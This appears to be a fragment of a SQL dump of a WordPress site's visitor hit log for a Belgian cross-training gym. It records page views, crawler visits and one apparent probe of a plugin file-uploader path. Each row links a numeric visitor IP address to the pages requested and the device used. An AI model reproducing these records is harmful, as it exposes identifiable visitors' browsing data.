(72766, 1494912734.257428, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72767, 1494912734.719079, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72768, 1494912735.204543, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72769, 1494912735.729834, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72770, 1494914100.146899, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72771, 1494914100.665901, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72772, 1494914101.116996, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72773, 1494914101.572239, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72774, 1494914102.078814, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72775, 1494914102.649377, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72776, 1494914103.323461, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72777, 1494914103.899754, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72778, 1494914104.810954, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72779, 1494914105.232721, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72780, 1494914105.651376, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72781, 1494914106.153601, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72782, 1494914106.582337, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72783, 1494914107.002714, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72784, 1494915775.351898, 1401140181, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 7.0; F5321 Build/34.2.A.0.333; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/123.0.0.18.71;]'),
(72785, 1494921100.301287, 2509961901, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(72786, 1494921101.663866, 2509961901, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(72787, 1494921117.762166, 2509961901, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(72788, 1494921136.768371, 2509961901, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(72789, 1494924106.789372, 1053115180, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72790, 1494924108.214753, 1053115180, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72791, 1494924155.080574, 1053115180, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72792, 1494924160.118746, 1053115180, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72793, 1494927346.286544, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72794, 1494927346.772574, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72795, 1494927409.293811, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72796, 1494929305.053112, 2783008832, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.nl', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(72797, 1494929306.118802, 2783008832, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'),
(72798, 1494930568.764101, 1338303486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72799, 1494931446.219145, 2809328531, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0'),
(72800, 1494935520.890302, 632871405, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72801, 1494935521.553566, 632871405, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72802, 1494935522.073089, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72803, 1494935523.733005, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72804, 1494935524.218169, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72805, 1494935524.740218, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72806, 1494935525.465814, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72807, 1494935525.954081, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72808, 1494935526.439673, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72809, 1494935526.907084, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72810, 1494935527.418149, 632871405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72811, 1494938629.472356, 96260885, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72812, 1494938630.300439, 96260885, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72813, 1494938631.086239, 96260885, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72814, 1494938632.786986, 96260885, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72815, 1494938634.511345, 96260885, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72816, 1494938635.259011, 96260885, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72817, 1494938635.952946, 96260885, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72818, 1494938639.389613, 96260885, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72819, 1494946008.809795, 783517035, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72820, 1494946009.402028, 783517035, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72821, 1494946009.983900, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72822, 1494946010.484676, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72823, 1494946011.007301, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72824, 1494946012.667140, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72825, 1494946013.470136, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72826, 1494946014.105907, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72827, 1494946014.694234, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72828, 1494946015.521605, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72829, 1494946016.028919, 783517035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72830, 1494949823.606048, 1338303486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72831, 1494950533.398895, 1077858855, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(72832, 1494959159.853875, 1338303486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72833, 1494961926.697867, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72834, 1494966290.884936, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72835, 1494966291.670883, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72836, 1494966293.113998, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72837, 1494970062.877082, 1123631313, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72838, 1494970063.344721, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72839, 1494971059.635478, 676177839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72840, 1494971059.648660, 676177839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72841, 1494971683.900100, 3475901809, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72842, 1494972954.230077, 1338303486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72843, 1494975485.881127, 1338303486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72844, 1494976705.250864, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(72845, 1494978755.576211, 1338303486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72846, 1494983693.873970, 1338303486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72847, 1494984055.588692, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/php-event-calendar/server/file-uploader/', 'http://crosstrainingcenter.be/wp-content/plugins/php-event-calendar/server/file-uploader/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(72848, 1494990378.994247, 96260903, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72849, 1494990379.916940, 96260903, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72850, 1494990380.840860, 96260903, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72851, 1494990381.559569, 96260903, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72852, 1494990382.427023, 96260903, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72853, 1494990383.078695, 96260903, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72854, 1494990384.066561, 96260903, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72855, 1494991596.527631, 3024883608, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(72856, 1494991596.528804, 3024883590, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2'),
(72857, 1494991696.229853, 3024883474, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72858, 1494992318.480846, 1338303486, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(72859, 1494998661.542737, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72860, 1494998662.370437, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72861, 1494998662.908126, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72862, 1494998663.436682, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72863, 1494998663.962105, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72864, 1494998664.498878, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72865, 1494998665.211365, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72866, 1494998665.778557, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72867, 1494998666.289067, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72868, 1494998666.775296, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72869, 1494998667.283922, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72870, 1495006796.834585, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72871, 1495006797.322970, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72872, 1495006797.761227, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72873, 1495006798.256783, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72874, 1495006798.756035, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72875, 1495006799.162940, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72876, 1495006799.583969, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72877, 1495006800.188254, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72878, 1495006800.583576, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72879, 1495006800.999553, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72880, 1495006801.500302, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72881, 1495006802.080605, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72882, 1495006802.536821, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72883, 1495006803.013940, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72884, 1495010763.758808, 1375132497, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(72885, 1495010768.663230, 1375132497, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(72886, 1495015586.395334, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72887, 1495015589.889721, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72888, 1495015594.509948, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72889, 1495015599.132736, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72890, 1495015603.823593, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
